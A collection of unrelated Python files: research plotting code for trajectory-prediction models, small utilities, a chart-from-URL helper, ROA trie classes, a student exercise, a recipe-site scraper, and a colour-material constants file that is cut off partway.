if encoder_only: out_name = f'{out_name}__encoder'
out_path = os.path.join(out_dir, f'{out_name}.{format}')
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
# ## plot by_scene
if by_scene:
for ckpt_name, scene_dict in ckpt_scene_dict.items():
for scene_id in scene_dict.keys():
fig, ax = plt.subplots(figsize=(fig_size, 4))
plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
df = scene_dict[scene_id]
for i, meta_id in enumerate(df.index):
for b, block in enumerate(['Encoder', 'GoalDecoder', 'TrajDecoder']):
# plot each example
cols = df.columns[df.columns.str.contains(block)]
example = df.loc[meta_id, cols].to_numpy()
if example.shape[0]:
plt.plot(cols, example, c=colors[ckpt_name], linewidth=0.5, alpha=0.3)
# plot average
mean = df.loc[:, cols].mean(axis=0).to_numpy()
if (i == 0) & (b == 0):
plt.plot(cols, mean, '.-', c=colors[ckpt_name], label=f'diff_OODG_{ckpt_name}')
else:
plt.plot(cols, mean, '.-', c=colors[ckpt_name])
plt.title(f'Feature space difference ({scene_id})')
plt.ylabel(f'{diff_type} difference')
plt.xlabel('Layers')
plt.legend(loc='best')
if (depth == 0) | (depth == 1) | (encoder_only):
plt.xticks(rotation=45, ha='right')
else: # (depth == 2) | (depth == unknown)
plt.xticks(rotation=90, ha='right')
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
out_name = f'diff_OODG_{ckpt_name}__{scene_id}__D{depth}__N{n_data}__{diff_type}'
if encoder_only: out_name = f'{out_name}__encoder'
out_path = os.path.join(out_dir, f'{out_name}.{format}')
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
def plot_trajectories_scenes_overlay(image_path, df_biker, df_ped, out_dir='figures/scene_with_trajs', format='png'):
unique_scene = list(set(df_biker.sceneId.unique()).intersection(set(df_ped.sceneId.unique())))
scene_images = create_images_dict(unique_scene, image_path, 'reference.jpg', True)
for scene_id in unique_scene:
print(f'Plotting {scene_id}')
scene_biker = df_biker[df_biker.sceneId == scene_id]
scene_ped = df_ped[df_ped.sceneId == scene_id]
height, width = scene_images[scene_id].shape[0], scene_images[scene_id].shape[1]
fig = plt.figure(figsize=(height/50, width/50))
plt.imshow(scene_images[scene_id])
ms = 2
for _, traj in scene_biker.groupby('metaId'):
plt.scatter(traj.x, traj.y, s=ms, c='r', alpha=0.4)
plt.plot(traj.x, traj.y, 'r-', ms=ms, alpha=0.2)
plt.plot(0,0,'r-', alpha=0.5, label='Biker')
for _, traj in scene_ped.groupby('metaId'):
plt.scatter(traj.x, traj.y, s=ms, c='b', alpha=0.4)
plt.plot(traj.x, traj.y, 'b-', alpha=0.2)
plt.plot(0,0,'b-', alpha=0.5, label='Pedestrian')
plt.plot(0,0,'w')
plt.title(f'scene: {scene_id}')
plt.legend(loc='best')
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
out_path = os.path.join(out_dir, scene_id + '.' + format)
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
def plot_obs_pred_trajs(image_path, dict_trajs, out_dir='figures/prediction', format='png', obs_len=8):
first_dict = dict_trajs[list(dict_trajs)[0]]
scene_images = create_images_dict(first_dict['sceneId'], image_path, 'reference.jpg', True)
colors = {'OB': 'black', 'GT': 'green', 'INDG': 'cyan', 'OODG': 'blue', 'FT': 'orange', 'ET': 'red'}
for i, meta_id in enumerate(first_dict['metaId']):
scene_id = first_dict['sceneId'][i]
scene_image = scene_images[scene_id]
fig = plt.figure(figsize=(scene_image.shape[0]/100, scene_image.shape[1]/100))
plt.imshow(scene_image)
ms = 3
for j, (ckpt_name, value) in enumerate(dict_trajs.items()):
gt_traj = value['groundtruth'][i]
pred_traj = value['prediction'][i]
if j == 0:
plt.plot(gt_traj[:obs_len,0], gt_traj[:obs_len,1],
'.-', ms=ms, c=colors['OB'], label='observed')
plt.plot(gt_traj[(obs_len-1):,0], gt_traj[(obs_len-1):,1],
'.-', ms=ms, c=colors['GT'], label=labels_ckpt['GT'])
plt.plot([gt_traj[obs_len-1,0], pred_traj[0,0]], [gt_traj[obs_len-1,1], pred_traj[0,1]],
'.-', ms=ms, c=colors[ckpt_name])
plt.plot(pred_traj[:,0], pred_traj[:,1],
'.-', ms=ms, c=colors[ckpt_name], label=labels_ckpt[ckpt_name])
title = f'meta_id={meta_id}, scene_id={scene_id}'
plt.title(title)
plt.legend(loc='best')
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
out_name = f'{meta_id}__{scene_id}'
out_path = os.path.join(out_dir, out_name + '.'+ format)
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
def plot_decoder_overlay(image_path, dict_features, out_dir='figures/decoder', format='png', resize_factor=0.25):
# take decoder name
first_ckpt_dict = dict_features[list(dict_features)[0]]
if 'GoalDecoder' in first_ckpt_dict[list(first_ckpt_dict)[0]]:
goal_dec_name, traj_dec_name = 'GoalDecoder', 'TrajDecoder'
elif 'GoalDecoder_B7' in first_ckpt_dict[list(first_ckpt_dict)[0]]:
goal_dec_name, traj_dec_name = 'GoalDecoder_B7', 'TrajDecoder_B7'
else: # 'GoalDecoder_B7_L1' in first_ckpt_dict[list(first_ckpt_dict)[0]]
goal_dec_name, traj_dec_name = 'GoalDecoder_B7_L1', 'TrajDecoder_B7_L1'
# take unique scene images
scene_images = create_images_dict(
first_ckpt_dict.keys(), image_path, 'reference.jpg', True)
for scene_id, dict_scene in first_ckpt_dict.items():
for i, meta_id in enumerate(dict_scene['metaId']):
scene_image = scene_images[scene_id]
scene_image = cv2.resize(
scene_image, (0, 0), fx=resize_factor, fy=resize_factor, interpolation=cv2.INTER_AREA)
height, width = scene_image.shape[0], scene_image.shape[1]
# for each sample, visualize overlayed feature space
for _, feature_name in enumerate([goal_dec_name, traj_dec_name]):
n_channel = dict_scene[feature_name].shape[1]
n_ckpt = len(dict_features)
fig, axes = plt.subplots(
n_ckpt, n_channel, figsize=(n_channel*width/100, n_ckpt*height/100))
for k, (ckpt_name, dict_ckpt) in enumerate(dict_features.items()):
feature_i = dict_ckpt[scene_id][feature_name][i] # (n_channel, height, width)
for c in range(n_channel):
axes[k, c].imshow(scene_image)
axes[k, c].imshow(feature_i[c], alpha=0.7, cmap='coolwarm')
if c == 0:
axes[k, c].set_ylabel(labels_ckpt[ckpt_name])
else:
axes[k, c].set_yticklabels([])
if k != (n_ckpt - 1):
axes[k, c].set_xticklabels([])
else:
axes[k, c].set_xlabel(f'channel_{c+1}')
plt.subplots_adjust(wspace=0, hspace=0)
plt.tight_layout()
title = f'meta_id={meta_id}, scene_id={scene_id}, feature_name={feature_name}'
axes[0, n_channel//2].set_title(title)
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
out_name = f'{meta_id}__{scene_id}__{feature_name}__overlay'
out_path = os.path.join(out_dir, out_name + '.' + format)
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
def plot_filters(model_dict, out_dir='figures/filters', format='png'):
for model_name, model in model_dict.items():
for param_name, param in model.model.named_parameters():
if param_name.startswith(('encoder', 'goal_decoder', 'traj_decoder')):
if param_name.endswith('weight'):
c_out, c_in, height, width = param.shape
vmin, vmax = param.min().item(), param.max().item()
fig, axes = plt.subplots(c_in, c_out, figsize=(c_out*width, c_in*height))
for o in range(c_out):
for i in range(c_in):
im = axes[i, o].imshow(param[o, i].cpu().detach().numpy(), vmin=vmin, vmax=vmax)
axes[i, o].set_xticklabels([])
axes[i, o].set_yticklabels([])
divider = make_axes_locatable(axes[0, c_out-1])
cax = divider.append_axes('right', size='5%', pad=0.05)
fig.colorbar(im, cax=cax, orientation='vertical')
plt.subplots_adjust(wspace=0, hspace=0)
plt.tight_layout()
axes[0, c_out//2-1].set_title('Out channels')#
axes[c_in//2-1, 0].set_ylabel('In channels')
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
out_name = f'{model_name}__{param_name}'
out_path = os.path.join(out_dir, out_name + '.' + format)
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
def plot_filters_diff_evolution(
model_dict, out_dir='figures/filters_diff', format='png'):
if 'OODG' in model_dict.keys():
df_filters = pd.DataFrame()
for model_name, model in model_dict.items():
if model_name == 'OODG':
for param_name, param in model.model.named_parameters():
if not param_name.startswith('semantic_segmentation'):
df_filters.loc[param_name, model_name+'__sum'] = param.sum().item()
df_filters.loc[param_name, model_name+'__avg'] = param.mean().item()
else:
name = f'diff_OODG_{model_name}'
for (_, param_oodg), (param_name, param) in zip(
model_dict['OODG'].model.named_parameters(), model.model.named_parameters()):
if not param_name.startswith('semantic_segmentation'):
# df_filters.loc[param_name, model_name] = param.sum().item()
# d1 = (param_oodg - param).sum().item() / param_oodg.sum().item()
# d2 = ((param_oodg - param) / param_oodg).mean().item()
# d3 = (param_oodg - param).sum().item()
# print(model_name, param_name, d1, d2, d3)
df_filters.loc[param_name, model_name+'__sum'] = param.sum().item()
df_filters.loc[param_name, model_name+'__avg'] = param.mean().item()
# overall relative: can be distorted by outliers
df_filters.loc[param_name, name+'__overall_relative'] = \
(param_oodg - param).sum().item() / param_oodg.sum().item()
# pixel_relative: can be smoothed by the mostly low values in filters; std is possible..(big)
df_filters.loc[param_name, name+'__pixel_relative'] = \
((param_oodg - param) / param_oodg).mean().item()
# absolute
df_filters.loc[param_name, name+'__absolute'] = \
(param_oodg - param).sum().item()
colors.update({
'OODG_weight': 'tab:blue', 'FT_weight': 'tab:orange', 'ET_weight': 'tab:red',
'OODG_bias': 'lightsteelblue', 'FT_bias': 'navajowhite', 'ET_bias': 'pink',
'diff_OODG_FT_weight': 'tab:orange', 'diff_OODG_FT_bias': 'navajowhite',
'diff_OODG_ET_weight': 'tab:red', 'diff_OODG_ET_bias': 'pink'})
fig_width = df_filters.shape[0]*0.25+3
mask_w = df_filters.index.str.contains('weight')
mask_b = df_filters.index.str.contains('bias')
index = [n.rstrip('.weight') for n in df_filters.index[mask_w]]
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
# absolute values: plot
for op in ['sum', 'avg']:
fig, ax = plt.subplots(figsize=(fig_width, 4))
for model_name in model_dict.keys():
plt.plot(index, df_filters.loc[mask_w, f'{model_name}__{op}'],
'-', c=colors[model_name], label=model_name+'_weight')
plt.plot(index, df_filters.loc[mask_b, f'{model_name}__{op}'],
'--', c=colors[model_name], label=model_name+'_bias')
plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
plt.title('Filters')
plt.ylabel('Value')
plt.xlabel('Layers')
plt.legend(loc='best')
plt.xticks(rotation=45, ha='right')
out_name = f'filters_{"_".join(model_dict.keys())}__{op}__plot.{format}'
out_path = os.path.join(out_dir, out_name)
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
# absolute values: bar plot
df_dict = {}
for op in ['sum', 'avg']:
df = pd.DataFrame(index=index)
for model_name in model_dict.keys():
df.loc[index, model_name+'_weight'] = df_filters.loc[mask_w, f'{model_name}__{op}'].values
df.loc[index, model_name+'_bias'] = df_filters.loc[mask_b, f'{model_name}__{op}'].values
df_dict[op] = df
df.plot(kind='bar', color=[colors.get(x) for x in df.columns],
figsize=(fig_width, 4), title='Filters',
xlabel='Layers', ylabel='Value', rot=45, legend=True)
plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
plt.xticks(rotation=45, ha='right')
out_name = f'filters_{"_".join(model_dict.keys())}__{op}__bar.{format}'
out_path = os.path.join(out_dir, out_name)
plt.savefig(out_path, bbox_inches='tight')
plt.close()
print(f'Saved {out_path}')
# barplot separately
for op in ['sum', 'avg']:
df = df_dict[op]
for name in ['weight', 'bias']:
cols = [c for c in df.columns if c.endswith(name)]
df[cols].plot(kind='bar', color=[colors.get(x) for x in cols],
figsize=(fig_width/1.7, 4), title='Filters',
xlabel='Layers', ylabel='Value', rot=45, legend=True)
plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
plt.xticks(rotation=45, ha='right')
out_name = f'filters_{"_".join(model_dict.keys())}__{op}__bar__{name}.{format}'
out_path = os.path.join(out_dir, out_name)
plt.savefig(out_path, bbox_inches='tight')
plt.close()
print(f'Saved {out_path}')
# plot filters' difference
for diff_type in ['overall_relative', 'pixel_relative', 'absolute']:
# plot
fig, ax = plt.subplots(figsize=(fig_width, 4))
columns = df_filters.columns[
df_filters.columns.str.startswith('diff') & df_filters.columns.str.endswith(diff_type)]
for column in columns:
name, _ = column.split('__')
plt.plot(index, df_filters.loc[mask_w, column], '-', c=colors[name], label=name+'_weight')
plt.plot(index, df_filters.loc[mask_b, column], '--', c=colors[name], label=name+'_bias')
plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
plt.title('Filters')
plt.xlabel('Layers')
plt.legend(loc='best')
plt.xticks(rotation=45, ha='right')
out_name = f'filters_diff_{"_".join(model_dict.keys())}__{diff_type}__plot.{format}'
out_path = os.path.join(out_dir, out_name)
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
# barplot
df = pd.DataFrame(index=index)
for column in columns:
name, _ = column.split('__')
df.loc[index, name+'_weight'] = df_filters.loc[mask_w, column].values
df.loc[index, name+'_bias'] = df_filters.loc[mask_b, column].values
df.plot(kind='bar', color=[colors.get(x) for x in df.columns],
figsize=(fig_width, 4), title='Filters',
xlabel='Layers', ylabel='Value', legend=True)
plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
plt.xticks(rotation=45, ha='right')
out_name = f'filters_diff_{"_".join(model_dict.keys())}__{diff_type}__bar.{format}'
out_path = os.path.join(out_dir, out_name)
plt.savefig(out_path, bbox_inches='tight')
plt.close()
print(f'Saved {out_path}')
# barplot separately
for name in ['weight', 'bias']:
cols = [c for c in df.columns if c.endswith(name)]
df[cols].plot(kind='bar', color=[colors.get(x) for x in cols],
figsize=(fig_width/1.7, 4), title='Filters',
xlabel='Layers', ylabel='Value', rot=45, legend=True)
plt.axhline(y=0, color='gray', linestyle='-', linewidth=0.5, alpha=0.3)
plt.xticks(rotation=45, ha='right')
out_name = f'filters_diff_{"_".join(model_dict.keys())}__{diff_type}__bar__{name}.{format}'
out_path = os.path.join(out_dir, out_name)
plt.savefig(out_path, bbox_inches='tight')
plt.close()
print(f'Saved {out_path}')
else:
raise ValueError('No generalization model found')
def plot_per_importance_analysis(
tuned_name, df, n_test, scene_id, depth,
ade_oodg_mean, fde_oodg_mean, ade_oodg_std, fde_oodg_std,
ade_tuned_mean, fde_tuned_mean, ade_tuned_std, fde_tuned_std,
out_dir='figures/importance_analysis', format='png', plot_err_bar=False
):
print('OODG:')
print(f'ADE mean={round(ade_oodg_mean, 2)}, FDE mean={round(fde_oodg_mean, 2)}')
print(f'ADE std={round(ade_oodg_std, 2)}, FDE std={round(fde_oodg_std, 2)}')
print(tuned_name, ':')
print(f'ADE mean={round(ade_tuned_mean, 2)}, FDE mean={round(fde_tuned_mean, 2)}')
print(f'ADE std={round(ade_tuned_std, 2)}, FDE std={round(fde_tuned_std, 2)}')
tuned_diff = {
'ade_diff': ade_oodg_mean - ade_tuned_mean,
'fde_diff': fde_oodg_mean - fde_tuned_mean
}
# bar plot
for metric in ['ade_diff', 'fde_diff']:
fig_width = df.shape[0] * 0.25 + 3
if depth == -1:
# plot bias and weight with two colors
colors = {'weight': 'tab:blue', 'bias': 'lightsteelblue'}
mask_w = df.index.str.contains('weight')
mask_b = df.index.str.contains('bias')
index = [n.rstrip('.weight') for n in df.index[mask_w]]
df_data = pd.DataFrame(index=index)
df_data.loc[index, 'weight'] = df.loc[mask_w, metric].values
df_data.loc[index, 'bias'] = df.loc[mask_b, metric].values
if plot_err_bar:
df_err = pd.DataFrame(index=index)
df_err.loc[index, 'weight'] = df.loc[mask_w, metric+'_std'].values
df_err.loc[index, 'bias'] = df.loc[mask_b, metric+'_std'].values
df_data.plot(kind='bar', color=[colors.get(c) for c in df_data.columns],
figsize=(fig_width/1.7, 4), yerr=df_err, xlabel='Layers', ylabel=metric,
title='Importance analysis' if not scene_id else f'Importance analysis ({scene_id})')
else:
df_data.plot(kind='bar', color=[colors.get(c) for c in df_data.columns],
figsize=(fig_width/1.7, 4), xlabel='Layers', ylabel=metric,
title='Importance analysis' if not scene_id else f'Importance analysis ({scene_id})')
elif (depth == 1) or (depth == 2):
# organize index
df.index = df.reset_index()['layer'].apply(
lambda x: x.split(',')[-1] if len(x.split(','))==1 else x.split(',')[-1].lstrip(" '").rstrip("']"))
df = df.sort_values(by='layer')
# plot
if plot_err_bar:
df[[metric]].plot(kind='bar',
yerr=df[[metric+'_std']].rename(columns={metric+'_std': metric}),
figsize=(fig_width/1.3, 4), xlabel='Layers', ylabel=metric,
title='Importance analysis' if not scene_id else f'Importance analysis ({scene_id})')
else:
df[[metric]].plot(kind='bar',
figsize=(fig_width/1.3, 4), xlabel='Layers', ylabel=metric,
title='Importance analysis' if not scene_id else f'Importance analysis ({scene_id})')
else:
raise ValueError('No support for depth={depth}')
plt.axhline(y=tuned_diff[metric], color='tab:red',
linestyle='--', linewidth=1, alpha=0.5, label=f'diff_OODG_{tuned_name}')
plt.xticks(rotation=45, ha='right')
plt.legend(loc="upper right")
if not scene_id:
out_name = f'{tuned_name}_{metric}__N{n_test}'
else:
out_name = f'{tuned_name}_{metric}__N{n_test}__{scene_id}'
if plot_err_bar: out_name += f'__err.{format}'
out_path = os.path.join(out_dir, out_name)
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
plt.savefig(out_path, bbox_inches='tight')
plt.close()
print(f'Saved {out_path}')
def plot_importance_analysis(
in_dir, out_dir='figures/importance_analysis', format='png',
n_test=500, depth=-1, plot_err_bar=False):
# pretrained models
df_oodg = pd.read_csv(f'{in_dir}/OODG__N{n_test}.csv')
ade_oodg_mean, fde_oodg_mean = df_oodg.ade.mean(), df_oodg.fde.mean()
ade_oodg_std, fde_oodg_std = df_oodg.ade.std(), df_oodg.fde.std()
# tuned models
for tuned_name in ['FT', 'ET']:
# results
if not os.path.exists(f'{in_dir}/{tuned_name}__N{n_test}.csv'):
continue
df_tuned = pd.read_csv(f'{in_dir}/{tuned_name}__N{n_test}.csv')
ade_tuned_mean, fde_tuned_mean = df_tuned.ade.mean(), df_tuned.fde.mean()
ade_tuned_std, fde_tuned_std = df_tuned.ade.std(), df_tuned.fde.std()
# results after replacing one layer
df_avg, df_sample = pd.DataFrame(), pd.DataFrame()
# collect files
pattern = f'{in_dir}/{tuned_name}__N{n_test}__*.csv'
file_names = glob.glob(pattern)
if file_names:
for file_name in file_names:
layer_name = file_name.split('__')[-1].replace('.csv', '')
df_file = pd.read_csv(file_name)
df_file['layer'] = layer_name
df_file.loc[:, 'ade_diff'] = df_oodg.ade - df_file.ade
df_file.loc[:, 'fde_diff'] = df_oodg.fde - df_file.fde
df_avg = pd.concat([df_avg, pd.DataFrame({
'layer': layer_name,
'ade_diff': df_file.ade_diff.mean(),
'fde_diff': df_file.fde_diff.mean(),
'ade_diff_std': df_file.ade_diff.std(),
'fde_diff_std': df_file.fde_diff.std()},
index=[0])], ignore_index=True, axis=0)
df_sample = pd.concat([df_sample, df_file], ignore_index=True, axis=0)
df_avg = df_avg.sort_values(by='layer', ascending=True)
df_avg.set_index('layer', drop=True, inplace=True)
# plot averaged case
plot_per_importance_analysis(
tuned_name, df_avg, n_test, None, depth,
ade_oodg_mean, fde_oodg_mean, ade_oodg_std, fde_oodg_std,
ade_tuned_mean, fde_tuned_mean, ade_tuned_std, fde_tuned_std,
out_dir, plot_err_bar=False
)
plot_per_importance_analysis(
tuned_name, df_avg, n_test, None, depth,
ade_oodg_mean, fde_oodg_mean, ade_oodg_std, fde_oodg_std,
ade_tuned_mean, fde_tuned_mean, ade_tuned_std, fde_tuned_std,
out_dir, plot_err_bar=True
)
# plot by scene
df_gb = df_sample.groupby(by=['sceneId', 'layer']).agg(['mean', 'std']).reset_index()
df_selected = df_gb[['sceneId', 'layer']].copy()
df_selected.loc[:, 'ade_diff'] = df_gb['ade_diff']['mean']
df_selected.loc[:, 'fde_diff'] = df_gb['fde_diff']['mean']
df_selected.loc[:, 'ade_diff_std'] = df_gb['ade_diff']['std']
df_selected.loc[:, 'fde_diff_std'] = df_gb['fde_diff']['std']
for scene_id in df_selected.sceneId.unique():
df_scene = df_selected[df_selected.sceneId == scene_id]
df_scene = df_scene.sort_values(by='layer', ascending=True)
df_scene.set_index('layer', drop=True, inplace=True)
# TODO: legend format is incorrect
plot_per_importance_analysis(
tuned_name, df_scene[['ade_diff', 'fde_diff']], n_test, scene_id, depth,
ade_oodg_mean, fde_oodg_mean, ade_oodg_std, fde_oodg_std,
ade_tuned_mean, fde_tuned_mean, ade_tuned_std, fde_tuned_std,
out_dir+'/scenes', plot_err_bar=False
)
plot_per_importance_analysis(
tuned_name,
df_scene[['ade_diff', 'fde_diff', 'ade_diff_std', 'fde_diff_std']],
n_test, scene_id, depth,
ade_oodg_mean, fde_oodg_mean, ade_oodg_std, fde_oodg_std,
ade_tuned_mean, fde_tuned_mean, ade_tuned_std, fde_tuned_std,
out_dir+'/scenes', plot_err_bar=True
)
def plot_saliency_maps(
input, grad_input, saliency_name, filename,
out_dir='figures/saliency_maps', format='png',
side_by_side=True, best_points=None):
# ## plot for one sample
scene_id, meta_id = filename.split('__')[1], filename.split('__')[2]
_, _, height, width = input.shape
fig, axes = plt.subplots(1, 2, figsize=(width/100*2+1, height/100))
# format
if torch.is_tensor(input):
input = input.cpu().detach().numpy()
if torch.is_tensor(grad_input):
grad_input = grad_input.cpu().detach().numpy()
# prepare input and switch channels
blue, green, red = input[0][0], input[0][1], input[0][2]
raw_img = np.empty((height, width, 3))
raw_img[:, :, 0] = red
raw_img[:, :, 1] = green
raw_img[:, :, 2] = blue
raw_img = (raw_img - input[0].min()) / (input[0].max() - input[0].min())
# prepare grad
grad_img = grad_input.sum(axis=(0, 1))
grad_img[grad_img < 0] = 0
# grad_img = (grad_img - grad_img.min()) / (grad_img.max() - grad_img.min())
pathlib.Path(out_dir).mkdir(parents=True, exist_ok=True)
if side_by_side:
# plot raw image
axes[0].imshow(raw_img)
axes[0].set_title(f'{scene_id}: {meta_id}')
# plot grad
if best_points is not None:
plt.scatter(best_points[0], best_points[1], c='r', marker='*')
im = axes[1].imshow(grad_img, cmap='gray_r')
axes[1].set_title(saliency_name)
plt.colorbar(im, ax=axes.ravel().tolist(), shrink=0.9)
# save
out_path = os.path.join(out_dir, f'{filename}.{format}')
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
# plot overlay
fig, ax = plt.subplots(1, 1, figsize=(width/100, height/100))
ax.imshow(raw_img)
ax.imshow(grad_img, cmap='copper', alpha=0.5)
if best_points is not None:
plt.scatter(best_points[0], best_points[1], c='r', marker='*')
ax.set_title(f'{meta_id}({scene_id}): {saliency_name}')
# save
out_path = os.path.join(out_dir, f'{filename}__overlay.{format}')
plt.savefig(out_path, bbox_inches='tight')
plt.close(fig)
print(f'Saved {out_path}')
def plot_saliency_maps_side_by_side():
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--results_dir", default='csv/dataset_filter/dataset_ped_biker/gap/3.25_3.75/3.25_3.75', type=str)
parser.add_argument("--out_dir", default='figures', type=str)
args = parser.parse_args()
create_few_shot_plot(args.results_dir, args.out_dir)
|
# -*- coding: utf-8 -*-
import os
import errno
import logging
import time
default_logger = logging.getLogger(__name__)
class Timer(object):
def __init__(self, name='-', logger=None):
self.name = name
self.logger = logger or default_logger
def __enter__(self):
self.start = time.time()
self.logger.debug("%s: started", self.name)
def __exit__(self, exc_type, exc_value, traceback):
end = time.time()
self.logger.info("%s: done for %0.3f seconds", self.name, end - self.start)
return False
def silentremove(filename):
try:
os.remove(filename)
except OSError as e: # this would be "except OSError, e:" before Python 2.6
if e.errno != errno.ENOENT: # errno.ENOENT = no such file or directory
raise # re-raise exception if a different error occured
|
from typing import List
from urllib.request import urlopen
import altair as alt
from .chart import Chart, LayerChart
import json
def get_chart_spec_from_url(url: str) -> List[str]:
"""
For extracting chart specs produced by the research sites framework
"""
response = urlopen(url)
content = response.read().decode().split("\n")
content = [x[18:-1] for x in content if "_spec = " in x]
return content
def json_to_chart(json_spec: str) -> alt.Chart:
"""
take a json spec and produce a chart
mostly needed for the weird work arounds needed for importing layer charts
"""
di = json.loads(json_spec)
if "layer" in di:
layers = di["layer"]
del di["layer"]
del di["width"]
chart = LayerChart.from_dict(
{"config": di["config"], "layer": [], "datasets": di["datasets"]}
)
for n, l in enumerate(layers):
di_copy = di.copy()
di_copy.update(l)
del di_copy["config"]
del di_copy["$schema"]
del di_copy["datasets"]
del di_copy["width"]
c = Chart.from_dict(di_copy)
chart += c
else:
del di["width"]
del di["config"]["view"]
chart = Chart.from_dict(di)
return chart
def get_chart_from_url(url: str, n: int = 0, include_df: bool = False) -> alt.Chart:
"""
given url, a number (0 indexed), get the spec,
and reduce an altair chart instance.
if `include_df` will try and reduce the original df as well.
"""
spec = get_chart_spec_from_url(url)[n]
chart = json_to_chart(spec)
if include_df:
df = chart.get_df()
return chart, df
else:
return chart
|
from ipaddress import IPv4Network, IPv6Network
from .roa_trie import ROATrie
class IPv4ROATrie(ROATrie):
"""Trie of IPv4 CIDRs for ROAs"""
prefix_class = IPv4Network
class IPv6ROATrie(ROATrie):
"""Trie of IPv6 CIDRs for ROAs"""
prefix_class = IPv6Network
|
# Module 3 Assignment
# Amir Ahsan
myfile = open ("question.txt", "r+")
myquestion = myfile.read()
myresponse = input(myquestion)
myfile.write(myresponse)
myfile.close()
|
import bs4, requests
from urllib.parse import unquote
def searchRecipe(text, page):
result = {
'recipes': []
}
icook_search_url = 'https://icook.tw/search/'
if page == 0:
url = icook_search_url + text
else:
url = icook_search_url + text + '?page=' + str(page)
agent = {"User-Agent":"Mozilla/5.0"}
request_result = requests.get(url, headers = agent)
soup = bs4.BeautifulSoup(request_result.content, "html.parser")
search_results = soup.find_all('li', class_ = 'browse-recipe-item')
page_tabs = soup.find_all('a', class_ = 'pagination-tab-link--number')
for search_result in search_results:
recipe_url = search_result.find('a', class_ = 'browse-recipe-link').get('href')
recipe_url = 'https://icook.tw' + recipe_url
recipe_name = search_result.find('h2', class_ = 'browse-recipe-name').text
recipe_name = recipe_name.replace('\n', '').replace(' ', '')
recipe_description = search_result.find('blockquote', class_ = 'browse-recipe-content-description')
if recipe_description == None:
continue
else:
recipe_description = recipe_description.text.replace('\n', '').replace(' ', '')
recipe_ingredients_preview = search_result.find('p', class_ = 'browse-recipe-content-ingredient').text
recipe_ingredients_preview = recipe_ingredients_preview.replace('\n', '').replace(' ', '')
recipe_image_url = search_result.find('img', class_ = 'browse-recipe-cover-img').get('data-src')
recipe_image_url = recipe_image_url.split('url=')[1].split('&width')[0]
recipe_image_url = unquote(recipe_image_url)
recipe_item = {
'url': recipe_url,
'name': recipe_name,
'description': recipe_description,
'url': recipe_url,
'ingredients_preview': recipe_ingredients_preview,
'image_url': recipe_image_url
}
result['recipes'].append(recipe_item)
return result |
from typing import List, NamedTuple
# TODO MCS-813 Use MaterialTuple throughout this file
class MaterialTuple(NamedTuple):
material: str
color: List[str]
UNTRAINED_COLOR_LIST = [
# Won't be used in Eval 3
]
AZURE = ("Custom/Materials/Azure", ["azure", "blue"])
BLACK = ("Custom/Materials/Black", ["black"])
BLUE = ("Custom/Materials/Blue", ["blue"])
BROWN = ("Custom/Materials/Brown", ["brown"])
CHARTREUSE = ("Custom/Materials/Chartreuse", ["chartreuse", "green"])
CYAN = ("Custom/Materials/Cyan", ["cyan", "blue", "green"])
GOLDENROD = ("Custom/Materials/Goldenrod", ["goldenrod", "yellow"])
GREEN = ("Custom/Materials/Green", ["green"])
GREY = ("Custom/Materials/Grey", ["grey"])
INDIGO = ("Custom/Materials/Indigo", ["indigo", "blue"])
LIME = ("Custom/Materials/Lime", ["lime", "green"])
MAGENTA = ("Custom/Materials/Magenta", ["magenta", "purple"])
MAROON = ("Custom/Materials/Maroon", ["maroon", "red"])
NAVY = ("Custom/Materials/Navy", ["navy", "blue"])
OLIVE = ("Custom/Materials/Olive", ["olive", "green"])
ORANGE = ("Custom/Materials/Orange", ["orange"])
PINK = ("Custom/Materials/Pink", ["pink", "red"])
RED = ("Custom/Materials/Red", ["red"])
ROSE = ("Custom/Materials/Rose", ["rose", "red"])
PURPLE = ("Custom/Materials/Purple", ["purple"])
SPRINGGREEN = ("Custom/Materials/SpringGreen", ["springgreen", "green"])
TAN = ("Custom/Materials/Tan", ["brown"])
TEAL = ("Custom/Materials/Teal", ["teal", "blue", "green"])
VIOLET = ("Custom/Materials/Violet", ["violet", "purple"])
WHITE = ("Custom/Materials/White", ["white"])
YELLOW = ("Custom/Materials/Yellow", ["yellow"])
# Only colors/materials that are exact opposites of one another.
OPPOSITE_MATERIALS = [
AZURE,
BLACK,
BLUE,
CHARTREUSE,
CYAN,
GREEN,
LIME,
MAGENTA,
MAROON,
NAVY,
OLIVE,
ORANGE,
RED,
ROSE,
PURPLE,
SPRINGGREEN,
TEAL,
VIOLET,
WHITE,
YELLOW
]
OPPOSITE_SETS = {
"Custom/Materials/Azure": ORANGE,
"Custom/Materials/Black": WHITE,
"Custom/Materials/Blue": YELLOW,
"Custom/Materials/Brown": GREY, # Not an official opposite
"Custom/Materials/Chartreuse": VIOLET,
"Custom/Materials/Cyan": RED,
"Custom/Materials/Goldenrod": INDIGO, # Not an official opposite
"Custom/Materials/Green": PURPLE,
"Custom/Materials/Grey": BROWN, # Not an official opposite
